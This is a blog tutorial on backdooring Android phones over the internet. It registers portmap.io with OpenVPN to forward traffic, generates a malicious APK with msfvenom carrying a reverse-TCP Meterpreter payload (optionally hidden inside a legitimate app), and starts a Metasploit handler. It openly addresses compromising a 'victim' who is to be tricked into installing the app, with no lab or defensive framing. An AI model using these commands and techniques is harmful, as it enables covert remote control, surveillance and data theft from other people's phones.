Hacking Android over WAN And Using Portmap.io to sustain the Backdoor

Hey guys,
In this blog, we are going to see how to hack an android device using a backdoor apk, so that we may gain access to it anytime.

Note: You should have the victim install a malicious App, I may only teach what to do before and after installation. It is up to your intelligence to make the victim install the App.

Ok first, Let me explain what we are going to do.

Normally on a LAN, we create a Malicious file, have it executed on a machine in our Local Network. We may use the Private IP to return connections to, But on WAN that doesn’t work and you should do port forwarding, so that on a Public IP on a specific port if a connection is recieved, it is redirected to you on your local port.

We are going to use a public VPN, to get traffic routed to our device.
So you would require
Metasploit Framework
OpenVPN

If you don’t understand that, just leave it and lets get our hands dirty.

Since both tools mentioned are available for most platforms, so it works in almost all platforms, even in android in Termux.

We are going to use a free public service called portmap.io and yeah definitely as you thought, free and public definitely has some limitations.

First create an account here
www.portmap.io/register

Then Login to your account in
www.portmap.io/login

Portmap.io login screen

After Logging In, go to the configurations in the top navigation bar,

Configurations in the Navigation bar

Next, click on the Create New Configuration button,

Create New Configuration Button

Next, it asks for some details fill in as

Name      - Anything you may wish
Type - OpenVPN
Proto - TCP
Comment - Just for your reference
Generating Configuration

Click on the Generate button.

After generating the Config file, Download it to your machine.
It is the file that is going to give access to a public VPN service.

Then Click on Create to create the configuration.

New Configuration Added

Next we have to Create Mapping Rules, Click on the Mapping Rules in the Navigation bar.

This is the rule which says like, Ah! packet for cyberraw69, get this packet to him in port <port you forwarded>.

Mapping Rules in Navigation bar

Then click on Create a New Rule.

Creating New Rule

Again, it asks for some important details, fill these in carefully

Configuration - Its default limited for free accounts.
Protocol - TCP
Hostname - <your username> portmap.io / portmap.host (anything you wish)
port on portmap - Its unchangeable
Port on PC - Anything you wish, remember this port well, you need it when you run the payload handler.
Allowed IP - Optional, (Like a firewall)
Creating a Rule

Then Click on Create to create to the rule.

Mapping Rule Added

Aaah, If you followed everything as mentioned, the work with the browser is over and you may close it, if you could remember what is in the
above screenshot.

Now we are going to act like a hacker, open the terminal :)

Navigate to where you downloaded the configuration file.(The first step)

cd Downloads
ls

Then run openvpn using that configuration file

sudo openvpn --config mrfucker755.cyberraw69.ovpn
Running the OpenVPN

It gets stuck saying Initialization Sequence Completed
It means that so far you did everything correctly, Good Job man, read on.

Donot Close this screen, this routes the traffic from portmap.io to you. So just minimize it and open another terminal.

Now we are going to generate the malicious apk file, using msfvenom as

msfvenom -p android/meterpreter/reverse_tcp LHOST=mrfucker755-47939.portmap.host LPORT=47939 R > Backdoor.apk

Do you recognize the LHOST? its the one from the Mapping Rules Page. Type in if you remember, else look back.

Generating the Malicious App

You can also embed the payload to a legit apk, using the -x option.

msfvenom -p android/meterpreter/reverse_tcp -x <legit app> LHOST=mrfucker755-47939.portmap.host LPORT=47939 -o Backdoor.apk

This doesn’t work on all legit apps because of secure coding practices.

Now Start the metasploit framework,

msfconsole

Set the necessary options as,

use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST <tun0-IP>
set LPORT <Port you gave in mapping rules>

To get the IP address,

ifconfig tun0
Running ifconfig tun0

Put in your IP as LHOST. At last, everything is set. Now you may run the exploit. For the LPORT, it should be same as the one in Mapping rule, Port on your PC. If the port is below 1024, you would need to be root, so better stick with default 4444 or use 8080

run

Now the handler will be started and waiting for connections.

Running the exploit

Now its your time, Install the app in Victim’s device and After installing you may find the App as MainActivity. Double tap the Application. When you double tap it, you would see connections coming to your device.

Popping the Shell

And congrats !!, you popped a shell on that device.

To view all the commands, type in

help

You may run any of the commands listed, if you have any error running a command, you may close the existing session and open a new one.(just press Ctrl+C in Meterpreter session and Double tap the app once more)

There are other port forwarding services too that are free, two things I know are
ngrok
serveo

Ngrok is good for static things like running a website. But in this, when you terminate ngrok, you have to redo the whole process. Because, PORT changes everytime when you run ngrok.

Serveo is good and it doesn’t even need an account to use. It is somewhat similar to this portmap.io. It uses something different called SSH Forwarding. I plan to write about in future. So stay tuned.

The advantage of this is when you get something like
Meterpreter Session Closed — Reason died

You donot need to redo everything, you just double tap the apk. This app would route connections to you always, until you have the OpenVPN and Msf Handler running.

So thats it, thanks for reading, hope you Learned something.

If you have problems, please watch this video,
https://www.youtube.com/watch?v=9bqt5QA48Z4

If you want to know whats happening behind the scenes message me at twitter @n00bie4

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store